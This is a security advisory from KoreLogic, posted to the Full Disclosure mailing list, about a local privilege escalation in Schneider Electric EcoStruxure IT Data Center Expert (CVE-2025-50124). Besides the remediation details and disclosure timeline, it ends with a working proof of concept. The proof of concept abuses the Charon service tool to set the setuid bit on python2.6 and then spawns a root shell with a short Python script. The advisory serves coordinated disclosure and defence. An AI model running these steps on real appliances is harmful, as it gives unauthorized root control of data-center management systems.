| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <3e1747cc-38d9-43f2-805e-8bba9d8564f0@korelogic.com>
Date: Wed, 9 Jul 2025 17:17:32 -0500
From: KoreLogic Disclosures via Fulldisclosure <fulldisclosure@...lists.org>
To: fulldisclosure@...lists.org
Subject: [FD] KL-001-2025-010: Schneider Electric EcoStruxure IT Data Center
Expert Privilege Escalation
KL-001-2025-010: Schneider Electric EcoStruxure IT Data Center Expert Privilege Escalation
Title: Schneider Electric EcoStruxure IT Data Center Expert Privilege Escalation
Advisory ID: KL-001-2025-010
Publication Date: 2025-07-09
Publication URL: https://korelogic.com/Resources/Advisories/KL-001-2025-010.txt
1. Vulnerability Details
Affected Vendor: Schneider Electric
Affected Product: EcoStruxure IT Data Center Expert
Affected Version: 8.3 and prior
Platform: CentOS
CWE Classification: CWE-266: Incorrect Privilege Assignment
CVE ID: CVE-2025-50124
2. Vulnerability Description
The Data Center Expert ("DCE") appliance contains a Charon
executable that can be used by a low-privileged attacker to
obtain root privileges. The Charon executable and configuration
appears to be a local method for adding and removing services
that run within the DCE appliance.
3. Technical Description
The low-privilege user accounts that come by default on the
DCE appliance are restricted to very specific functions and
limited shell/menu interfaces. Arbitrary or customer-specific
low-privileged user accounts do not appear to be permitted
by design in the DCE appliance. However, if a low-privileged
shell is obtained by some method, the Charon executable can
be leveraged to obtain root privileges.
After having obtained root-level compromise with the
Hostname RCE vulnerability in the .bcsetup script
(CVE-2025-50123/KL-001-2025-009), researchers added
(i.e. useradd) a low-privileged account on the appliance. The
idea behind setting up a low-privileged account was to see if
there were privilege- escalations paths, in the event that an
attacker was able to obtain a low-privileged account/shell on
the box.
The Charon executable and associated configuration file
(/etc/nbc/cerberus.cfg), allow for "start" and "stop" commands
that are executed as root. A low-privileged attacker could
assign their own Charon "application" with attacker-defined
"start" and "stop" commands, as illustrated below.
4. Mitigation and Remediation Recommendation
Version 9.0 of EcoStruxure IT Data Center Expert includes
fixes for these vulnerabilities and is available upon request
from Schneider Electric's Customer Care Center. Refer to
https://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2025-189-01&p_enDocType=Security+and+Safety+Notice&p_File_Name=SEVD-2025-189-01.pdf.
5. Credit
This vulnerability was discovered by Jaggar Henry and Jim
Becher of KoreLogic, Inc.
6. Disclosure Timeline
2024-11-21 : KoreLogic reports vulnerability details to
Schneider Electric CPCERT.
2024-11-22 : Vendor acknowledges receipt of KoreLogic's
submission.
2024-12-06 : Vendor confirms the reported vulnerability.
2024-12-12 : Vendor requests a meeting with KoreLogic to discuss
the timeline of remediation efforts for this
vulnerability, as well as for associated submissions
from KoreLogic.
2024-12-18 : KoreLogic and Schneider Electric agree to embargo
vulnerability details until product update 9.0,
circa July, 2025.
2025-01-29 : Vendor provides status update.
2025-03-17 : Vendor provides beta release containing remediation
for this and other associated vulnerabilities
reported by KoreLogic.
2025-06-20 : Vendor notifies KoreLogic that the publication date
for this vulnerability will be 2025-07-08.
2025-07-08 : Vendor public disclosure.
2025-07-09 : KoreLogic public disclosure.
7. Proof of Concept
Attacker lists the Charon applications that are currently
configured on the appliance:
[attacker@...zy ~]$ /usr/local/netbotz/nbc/bin/charon list
Tue Jun 4 08:37:37 2024 - loading configuration
Application # 0
name=NBC
pre="NONE"
start="/usr/local/netbotz/nbc/bin/central.sh"
stop="/usr/local/netbotz/nbc/bin/central.sh stop"
sort=15
Attacker adds a new Charon application called "root-it" to
the appliance. The application when started, will execute the
"/bin/chmod u+s /usr/bin/python2.6" command, and when the
application is stopped, it will execute "bin/chmod u-s
/usr/bin/python2.6".
[attacker@...zy ~]$ /usr/local/netbotz/nbc/bin/charon add root-it "/bin/chmod u+s /usr/bin/python2.6"
"/bin/chmod u-s /usr/bin/python2.6" 1 NONE
Added application root-it
The command below shows that the python2.6 executable is not setuid root.
[attacker@...zy ~]$ ls -al /usr/bin/python2.6
-rwxr-xr-x 2 root root 9032 Aug 18 2016 /usr/bin/python2.6
The cerberus.cfg file contains the Charon applications and their configuration.
[attacker@...zy ~]$ cat /etc/nbc/cerberus.cfg
#
# Cerberus Config File
#
[NBC]
sort=15
pre=NONE
start=/usr/local/netbotz/nbc/bin/central.sh
stop=/usr/local/netbotz/nbc/bin/central.sh stop
[root-it]
sort=1
pre=NONE
start=/bin/chmod u+s /usr/bin/python2.6
stop=/bin/chmod u-s /usr/bin/python2.6
Attacker starts the "root-it" application:
[attacker@...zy ~]$ /usr/local/netbotz/nbc/bin/charon start root-it
Started application root-it with pid 19556
The python2.6 executable is not setuid root.
[attacker@...zy ~]$ ls -al /usr/bin/python2.6
-rwsr-xr-x 2 root root 9032 Aug 18 2016 /usr/bin/python2.6
A simple python script can leverage the setuid root python2.6 executable
to gain a root shell.
[attacker@...zy ~]$ cat ./root-it.py
import os
os.setuid(0)
os.system("/bin/bash")
[attacker@...zy ~]$ id
uid=503(attacker) gid=503(attacker) groups=503(attacker)
[attacker@...zy ~]$ /usr/bin/python2.6 ./root-it.py
[root@...zy ~]# id
uid=0(root) gid=503(attacker) groups=503(attacker)
[root@...zy ~]# exit
[attacker@...zy ~]$ ls -al /usr/bin/python2.6
-rwsr-xr-x 2 root root 9032 Aug 18 2016 /usr/bin/python2.6
Attacker can stop the "root-it" application to remove setuid root
on the python2.6 executable.
[attacker@...zy ~]$ /usr/local/netbotz/nbc/bin/charon stop root-it
Killed application root-it
[attacker@...zy ~]$ ls -al /usr/bin/python2.6
-rwxr-xr-x 2 root root 9032 Aug 18 2016 /usr/bin/python2.6
The contents of this advisory are copyright(c) 2025
KoreLogic, Inc. and are licensed under a Creative Commons
Attribution Share-Alike 4.0 (United States) License:
http://creativecommons.org/licenses/by-sa/4.0/
KoreLogic, Inc. is a founder-owned and operated company with a
proven track record of providing security services to entities
ranging from Fortune 500 to small and mid-sized companies. We
are a highly skilled team of senior security consultants doing
by-hand security assessments for the most important networks in
the U.S. and around the world. We are also developers of various
tools and resources aimed at helping the security community.
https://www.korelogic.com/about-korelogic.html
Our public vulnerability disclosure policy is available at:
https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy
Download attachment "OpenPGP_signature.asc" of type "application/pgp-signature" (841 bytes)
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/
Powered by blists - more mailing lists